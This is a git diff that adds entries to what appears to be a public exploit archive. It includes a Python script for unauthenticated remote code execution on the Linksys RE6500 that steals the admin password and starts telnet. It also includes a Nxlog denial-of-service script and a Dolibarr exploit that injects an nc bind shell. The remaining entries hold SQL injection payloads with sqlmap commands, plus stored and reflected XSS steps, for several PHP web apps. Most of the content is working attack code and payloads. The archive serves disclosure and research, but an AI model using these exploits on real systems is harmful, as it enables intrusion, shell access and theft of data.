diff --git a/exploits/hardware/webapps/49270.py b/exploits/hardware/webapps/49270.py new file mode 100755 index 000000000..93f9c27ed --- /dev/null +++ b/exploits/hardware/webapps/49270.py @@ -0,0 +1,54 @@ +# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE +# Date: 31/07/2020 +# Exploit Author: RE-Solver +# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4 +# Vendor Homepage: www.linksys.com +# Version: FW V1.05 up to FW v1.0.11.001 +# Tested on: FW V1.05 up to FW v1.0.11.001 +# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE +# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. +# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. + +#!/usr/bin/env python + +from requests import Session +import requests +import os +print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.") +print("Tested on FW V1.05 up to FW v1.0.11.001") +print("RE-Solver @solver_re") +ip="192.168.1.226" + +command="nvram_get Password >/tmp/lastpwd" +#save device password; +post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" +url_codeinjection="http://"+ip+"/goform/setSysAdm" +s = requests.Session() +s.headers.update({'Origin': "http://"+ip}) +s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) + +r= s.post(url_codeinjection, data=post_data) +if r.status_code == 200: + print("[+] Prev password saved in /tmp/lastpwd") + +command="busybox telnetd" +#start telnetd; +post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" +url_codeinjection="http://"+ip+"/goform/setSysAdm" +s = requests.Session() +s.headers.update({'Origin': "http://"+ip}) +s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) + +r=s.post(url_codeinjection, data=post_data) +if r.status_code == 200: + print("[+] Telnet Enabled") + +#set admin password +post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1" +url_codeinjection="http://"+ip+"/goform/setSysAdm" +s = requests.Session() +s.headers.update({'Origin': "http://"+ip}) +s.headers.update({'Referer': "http://"+ip+"/login.shtml"}) +r=s.post(url_codeinjection, data=post_data) +if r.status_code == 200: + print("[+] Prevent corrupting nvram - set a new password= admin") \ No newline at end of file diff --git a/exploits/multiple/dos/49283.txt b/exploits/multiple/dos/49283.txt new file mode 100644 index 000000000..4de592ae7 --- /dev/null +++ b/exploits/multiple/dos/49283.txt @@ -0,0 +1,46 @@ +# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc) +# Date: 15/12/2020 +# Exploit Author: Guillaume PETIT +# Vendor Homepage: https://nxlog.co +# Software Link: https://nxlog.co/products/nxlog-community-edition/download +# Version: 2.10.2150 +# Tested on: Linux Debian 10 && Windows Server 2019 + +#!/usr/bin/python3 + +import sys +import time +import argparse +from scapy.all import * + +def getPayload(args): + # IF UNIX + if (args.OS == 1): + return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden" + # IF WINDOWS + elif (args.OS == 2): + return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden" + + # Test + elif (args.OS == 3): + return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden" + +def runExploit(args,payload): + priority = 30 + message = payload + syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message) + send(syslog,verbose=args.DEBUG) + +def getArguments(): + parser = argparse.ArgumentParser(description="Go h@ck SYSLOG") + parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server") + parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514") + parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test") + parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable") + return parser.parse_args() + +def main(): + args = getArguments() + payload = getPayload(args) + runExploit(args,payload) +main() \ No newline at end of file diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt index 06ea8299c..ed29dab88 100644 --- a/exploits/php/webapps/49209.txt +++ b/exploits/php/webapps/49209.txt @@ -5,6 +5,7 @@ # Tested on: Windows 10 # Web Browser: Mozilla Firefox & Opera # Google Dorks: "Powered by vBulletin® Version 5.6.3" +# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html Go to the "Admin CP" - click on "Styles" - click "Style Manager" - Choose "Denim" or other theme and choose action "Add new template" and diff --git a/exploits/php/webapps/49269.py b/exploits/php/webapps/49269.py new file mode 100755 index 000000000..41e8c2dff --- /dev/null +++ b/exploits/php/webapps/49269.py @@ -0,0 +1,77 @@ +# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated) +# Date: 2020.12.17 +# Exploit Author: Yilmaz Degirmenci +# Vendor Homepage: https://github.com/Dolibarr/dolibarr +# Software Link: https://sourceforge.net/projects/dolibarr/ +# Version: 12.0.3 +# Tested on: Kali Linux 2020.2 + +# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is +# vulnerable to authenticated Remote Code Execution Attack. An attacker who +# has the access the admin dashboard can manipulate the backup function by +# inserting payload into the zipfilename_template parameter at page +# /admin/tools/dolibarr_export.php by clicking on the button "Generate +# Backup" thus triggering command injection on target system. + +import requests +from bs4 import BeautifulSoup +from bs4 import Comment +import re +import lxml +import json +import urllib + +username = input("username: ") +password = input("password: ") +root_url = input("Root URL: http://192.168.0.15/ --> ") + +print("Exploit is sent! Check out if the bind shell on port 9999 active!") + +listener_port = "9999" + +login_url = root_url + "/index.php?mainmenu=home " +vulnerable_url = root_url + "/admin/tools/dolibarr_export.php" +upload_url = root_url + "/admin/tools/export_files.php" + +session = requests.Session() +request = session.get(login_url) + +# Get the token value +soup = BeautifulSoup(request.text,"lxml") +token = soup.find("input",{'name':'token'})['value'] + +# Login +body = {"token":token, "actionlogin":"login", +"loginfunction":"loginfunction", "tz":"-5", +"tz_string":"America%2FNew_York", "dst_observed":"1", +"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second": +"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664", +"dol_hide_topmenu":"", "dol_hide_leftmenu":"", +"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"", +"dol_use_jmobile":"", "username":username,"password":password} + +session.post(login_url, data=body, cookies=request.cookies) + +request = session.get(vulnerable_url) +token = soup.find("input",{'name':'token'})['value'] + +header = { +"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", +"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) +Gecko/20100101 Firefox/80.0", +"Accept":"*/", +"Accept-Encoding": "gzip, deflate", +"Origin": root_url, +"Referer": +root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools", +"Upgrade-Insecure-Requests": "1" +} + +body = {"token":token, "export_type":"server", "page_y":"1039", +"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar +--use-compress-program='nc -c bash -nlvp 9999' %0a :: ", +"compression":"gz"} + +param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote) + +session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header) \ No newline at end of file diff --git a/exploits/php/webapps/49271.txt b/exploits/php/webapps/49271.txt new file mode 100644 index 000000000..8a1238606 --- /dev/null +++ b/exploits/php/webapps/49271.txt @@ -0,0 +1,14 @@ +# Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS +# Exploit Author: Zhayi (Zeo) +# Date: 2020-12-14 +# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Tested on: WINDOWS 10 + +Step 1: Log in to the CMS with any valid user credentials. +Step 2: Click on the logged in username on header and select Manage Account. +Step 3: Rename the user First Name to +"". +Step 4: Update Profile and this will trigger the XSS. +Step 5: Logout and login again and the page will display the domain name. \ No newline at end of file diff --git a/exploits/php/webapps/49272.txt b/exploits/php/webapps/49272.txt new file mode 100644 index 000000000..0d737b0ed --- /dev/null +++ b/exploits/php/webapps/49272.txt @@ -0,0 +1,50 @@ +# Exploit Title: Content Management System 1.0 - 'email' SQL Injection +# Exploit Author: Zhayi (Zeo) +# Date: 2020-12-14 +# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: WINDOWS 10 + +Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login" +page in burpsute +Step 2. Save POST the packet +Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r +request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast +--dbs " +Step 4. This will inject successfully and you will have an information +disclosure of all databases contents + +POST the packet +--- +POST /ajax.php?action=login HTTP/1.1 +Host: 10.211.55.4 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 +Firefox/78.0 +Content-Length: 61 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 +Origin: http://10.211.55.4 +Referer: http://10.211.55.4/login.php +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip + +email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123 +--- + +SQLMAP +--- +Parameter: email (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND +'WlxU'='WlxU&password=admin123 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM +(SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123 +--- \ No newline at end of file diff --git a/exploits/php/webapps/49273.txt b/exploits/php/webapps/49273.txt new file mode 100644 index 000000000..db43ac797 --- /dev/null +++ b/exploits/php/webapps/49273.txt @@ -0,0 +1,58 @@ +# Exploit Title: Content Management System 1.0 - 'id' SQL Injection +# Exploit Author: Zhayi (Zeo) +# Date: 2020-12-14 +# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Category: Web Application +# Tested on: WINDOWS 10 + +Step 1. Capture the request of the " +http://127.0.0.1/ajax.php?action=load_list" page in burpsute +Step 2. Save POST the packet +Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r +request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast +--dbs " +Step 4. This will inject successfully and you will have an information +disclosure of all databases contents + +POST the packet +--- +POST /ajax.php?action=load_list HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 +Firefox/78.0 +Content-Length: 63 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 +Origin: http://127.0.0.1 +Referer: +http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip + +id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0 +--- + +SQLMAP +--- +Parameter: id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 +AND 'ZPQO'='ZPQO&start=0 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT +6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0 + + Type: UNION query + Title: Generic UNION query (NULL) - 10 columns + Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL +SELECT +NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- +-&start=0 +--- \ No newline at end of file diff --git a/exploits/php/webapps/49274.txt b/exploits/php/webapps/49274.txt new file mode 100644 index 000000000..d62a45ec6 --- /dev/null +++ b/exploits/php/webapps/49274.txt @@ -0,0 +1,52 @@ +# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-10 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi +# Affected Version: Version 1 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Parrot OS + +Step 1. Login to the application with any verified user credentials + +Step 2. Select Staff and select the view icon. + +Step 3. You will be redirected to a page like " +http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any +page that has the "id" parameter. Capture the current page request in +burpsuite + +Step 4. Save request and run sqlmap on request file using command " sqlmap +-r request -p id --time-sec=5 --dbs ". + +Step 5. This will inject successfully and you will have an information +disclosure of all databases contents. + +--- +Parameter: id (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE +(SELECT 4035 UNION SELECT 6415) END)) + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT +COUNT(*),CONCAT(0x716b6a7871,(SELECT +(ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: action=edit & id=22 AND (SELECT 4861 FROM +(SELECT(SLEEP(5)))xiXm) + + Type: UNION query + Title: Generic UNION query (NULL) - 9 columns + Payload: action=edit & id=22 UNION ALL SELECT +NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL-- +- +--- \ No newline at end of file diff --git a/exploits/php/webapps/49275.txt b/exploits/php/webapps/49275.txt new file mode 100644 index 000000000..c8740df9a --- /dev/null +++ b/exploits/php/webapps/49275.txt @@ -0,0 +1,18 @@ +# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-11 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Tested on: Parrot OS + +Step 1. Login to the application with any valid credentials + +Step 2. Click on the username in header and select "Manage Account". + +Step 3. On "Manage Account" page, insert "" in both the "First Name" & "Last Name" fields. + +Step 4. Complete the other required details and click on save to update user information. + +Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered \ No newline at end of file diff --git a/exploits/php/webapps/49276.txt b/exploits/php/webapps/49276.txt new file mode 100644 index 000000000..e1a407869 --- /dev/null +++ b/exploits/php/webapps/49276.txt @@ -0,0 +1,35 @@ +# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-11 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code +# Affected Version: Version 1 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Parrot OS + +Step 1. Login to the application with admin credentials + +Step 2. Click on Customer and select list. + +Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite + +Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". + +Step 5. This will inject successfully and you will have an information disclosure of all databases contents. + +--- +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: page=edit_staff&id=1 AND 4164=4164 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV) + + Type: UNION query + Title: Generic UNION query (NULL) - 10 columns + Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- - +--- \ No newline at end of file diff --git a/exploits/php/webapps/49277.txt b/exploits/php/webapps/49277.txt new file mode 100644 index 000000000..eeb81aa67 --- /dev/null +++ b/exploits/php/webapps/49277.txt @@ -0,0 +1,74 @@ +# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-11 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL +# Affected Version: Version 1 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Parrot OS + +Step 1. Login to the application with admin credentials + +Step 2. Click on "Bookings" in header and select "Add Bookings". + +Step 3. Complete the required details and click on "Save" to save the new Bookings. + +Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon. + +Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite. + +Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". + +Step 7. This will inject successfully and you will have an information disclosure of all databases contents. + +--- + +Parameter: id (GET) + + Type: boolean-based blind + + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + + Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg + + + + Type: error-based + + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + + + Payload: id=2' AND (SELECT 7113 FROM(SELECT +COUNT(*),CONCAT(0x716a626a71,(SELECT +(ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP + + + + Type: stacked queries + + Title: MySQL >= 5.0.12 stacked queries (comment) + + Payload: id=2';SELECT SLEEP(5)# + + + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq + + + + Type: UNION query + + Title: MySQL UNION query (NULL) - 4 columns + + + Payload: id=-1072' UNION ALL SELECT +NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL# + +--- \ No newline at end of file diff --git a/exploits/php/webapps/49278.txt b/exploits/php/webapps/49278.txt new file mode 100644 index 000000000..d997212aa --- /dev/null +++ b/exploits/php/webapps/49278.txt @@ -0,0 +1,22 @@ +# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-09 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee +# Affected Version: Version 1 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Parrot OS + +Step 1: Log in to the application with any valid user credentials. + +Step 2: Click on Add New Question Page. + +Step 3: input "" in the new question +field and select add new question. + +Step 4: Once you have an XSS payload as a question in add new question +page, click on View Questions Page. + +Step 5: This will trigger the XSS payload. \ No newline at end of file diff --git a/exploits/php/webapps/49279.txt b/exploits/php/webapps/49279.txt new file mode 100644 index 000000000..f720ae655 --- /dev/null +++ b/exploits/php/webapps/49279.txt @@ -0,0 +1,40 @@ +# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-10 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code +# Affected Version: Version 1 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Parrot OS + +Step 1. Login to the application with any verified user credentials + +Step 2. Click on View Candidates page and select take exam. If there is no +candidate, click on "Add New Candidate" page, fill details and add new +candidate. + +Step 3. Click on "Take Exam" and capture the request in burpsuite. + +Step 4. Save request and run sqlmap on request file using command " sqlmap +-r request -p id --time-sec=5 --dbs ". + +Step 5. This will inject successfully and you will have an information +disclosure of all databases contents. + +--- +Parameter: id (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980 +UNION SELECT 3372) END)) + + Type: stacked queries + Title: MySQL >= 5.0.12 stacked queries (comment) + Payload: id=1;SELECT SLEEP(5)# + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW) +--- \ No newline at end of file diff --git a/exploits/php/webapps/49280.txt b/exploits/php/webapps/49280.txt new file mode 100644 index 000000000..ba550882e --- /dev/null +++ b/exploits/php/webapps/49280.txt @@ -0,0 +1,27 @@ +# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS +# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) +# Date: 2020-12-09 +# Google Dork: N/A +# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code +# Affected Version: Version 1 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Parrot OS + +Step 1: Log in to the application with any valid user credentials. + +Step 2: Click on Add Employee. + +Step 3: input "" in all fields except phone number +fields. Note: increase the values of "1" in "alert(1)" to determine which +field is vulnerable. Eg , + ....etc. + +Step 4: Once all fields are completed, Click on ADD RECORD to save the +record. + +Step 5: Click on All Employees page and this will trigger the Stored XSS. + +Step 6: To view all Stored XSS, after clicking on All Employees page, click +on the View Employee Icon. This will tigger all Stored XSS payloads. \ No newline at end of file diff --git a/exploits/php/webapps/49281.txt b/exploits/php/webapps/49281.txt new file mode 100644 index 000000000..17b345c98 --- /dev/null +++ b/exploits/php/webapps/49281.txt @@ -0,0 +1,52 @@ +# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting) +# Date: 2020-12-14 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: https://www.phpjabbers.com +# Software Link: https://www.phpjabbers.com/appointment-scheduler +# Version: 2.3 +# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60) +# CVE: CVE-2020-35416 + +Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML. + +Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others. + +PoC Request: +GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1 +Host: [removed] +Connection: close +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +X-Requested-With: XMLHttpRequest +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://[removed] +Accept-Encoding: gzip, deflate +Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422 + +PoC Response: +HTTP/1.1 200 OK +Server: nginx +Date: Thu, 14 Dec 2020 10:48:41 GMT +Content-Type: text/html; charset=utf-8 +Connection: close +Vary: Accept-Encoding +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +Access-Control-Allow-Methods: POST, GET, OPTIONS +Access-Control-Allow-Headers: Origin, X-Requested-With +Content-Length: 13988 + +